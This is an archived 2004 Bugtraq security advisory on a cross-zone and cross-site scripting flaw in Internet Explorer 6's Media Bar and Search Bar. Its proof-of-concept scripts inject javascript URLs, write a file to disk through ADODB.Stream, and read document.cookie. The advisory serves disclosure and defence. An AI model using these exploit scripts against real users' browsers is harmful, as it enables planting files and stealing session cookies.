lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 3 Mar 2004 12:47:06 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: New Internet Explorer Cross Zone/Site Scripting Vulnerability





#########################################################################

Advisory Name : Internet Explorer Cross Zone/Site Scripting Vulnerability
 Release Date : Mar 3,2004 
  Application : Microsoft Internet Explorer
    Tested On : MS-IE 6.0(sp1)
   Vendor URL : http://www.microsoft.com/ie
       Author : Cheng Peng Su(apple_soup_at_msn.com)

#########################################################################


[Proof of Concept]
   The code below is used for loading a URL into the HTML content area of the Media Bar
   window.open("http://www.google.com/","_media")
   And javascript also can be injected:
   window.open("javascript:alert(location.href)","_media")
   in my computer,the code above will show me a MsgBox says 
        'res://C:\WINDOWS\SYSTEM\BROWSELC.DLL/mbLoading.htm'
   it suggests you that it's executed in My Computer Zone.
   We can also inject a code to the Media Bar which has connected to a website.
   As Media Bar ,Search Bar has the same vuln.
   
[Exploit]
   !YOU CAN FIND THE DOCUMENT AT
   !http://www.freewebs.com/applesoup/CrossBar/document.txt
  
   The code will use 'file:javascript:[script]' vuln which posted months ago.Maybe Microsoft
   has noticed the leak here,so i can't only use javascript-protocol in the code, and  script-tag
   is filtered out ,so i have to inject the script into img-tag.
   
   I. In Media Bar
   1 . Cross Zone Scripting Exploit
   ---------------------------CrossZone.htm---------------------------
   &lt;script&gt;
   
   // '\\42' -> '\42' -> ' " '
   img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
   + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
   + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';

   inject_html="<img src='" + img_src + "'>";
   
   window.open('file:javascript:document.write("' + inject_html + '")','_media');

   &lt;/script&gt;
   -------------------------------End---------------------------------
   
   
   2 . Cross Site Scripting Exploit
   ---------------------------CrossSite.htm---------------------------
   &lt;script&gt;

   window.open("http://www.google.com/","_media")
   setTimeout(function(){
   window.open("file:javascript:alert(document.cookie);","_media")
   },5000);
   
   &lt;/script&gt;
   -------------------------------End---------------------------------
   
   
   
   
   II. In Search Bar
   1 . Cross Zone Scripting Exploit
   ---------------------------CrossZone.htm---------------------------
   &lt;script&gt;
   window.open("http://wrong_site_add/","_search") //To load "Friendly HTTP error messages" page
                                                   // cause it's in My Computer Zone.
   setTimeout(function(){
   
      // '\\42' -> '\42' -> ' " '
      img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
      + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
      + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';

      inject_html="<img src='" + img_src + "'>";
   
      window.open('file:javascript:document.write("' + inject_html + '")','_search');

   },5000);
   
   &lt;/script&gt;
   -------------------------------End---------------------------------
      
   
   2 . Cross Site Scripting Exploit
   ---------------------------CrossSite.htm---------------------------
   &lt;script&gt;

   window.open("http://www.google.com/","_search")
   setTimeout(function(){
   window.open("file:javascript:alert(document.cookie);","_search")
   },5000);
   
   &lt;/script&gt;
   -------------------------------End---------------------------------

[Demo]
   Harmless demo:
   http://www.freewebs.com/applesoup/CrossBar/CrossSiteMB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossZoneMB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm
   
[Contact]
Cheng Peng Su
Class 1,Senior 2,high school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ